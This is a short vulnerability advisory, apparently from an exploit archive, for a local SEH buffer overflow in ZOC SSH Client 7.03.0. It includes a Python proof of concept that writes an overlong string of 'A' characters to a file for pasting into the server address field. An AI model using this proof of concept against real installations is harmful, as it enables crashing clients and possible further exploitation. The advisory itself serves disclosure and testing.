ZOC SSH Client 7.03.0 Buffer Overflow

Credit: Dolev Farhi
Risk: High
Local: Yes
Remote: No
CWE: CWE-119

# Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH) # Date: 20-5-2015 # Vendor homepage: www.emtec.com # Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20(Windows)&link=zoc/zoc7030.exe&ext=html # Author: Dolev Farhi # Details: # -------- # Create a new connection, run the py script and copy the AAAA...string from zoc.txt to clipboard. paste it in the # server address and attempt to connect. """ #!/usr/bin/python filename="zoc.txt" buffer = "\x41" * 97 textfile = open(filename , 'w') textfile.write(buffer) textfile.close()

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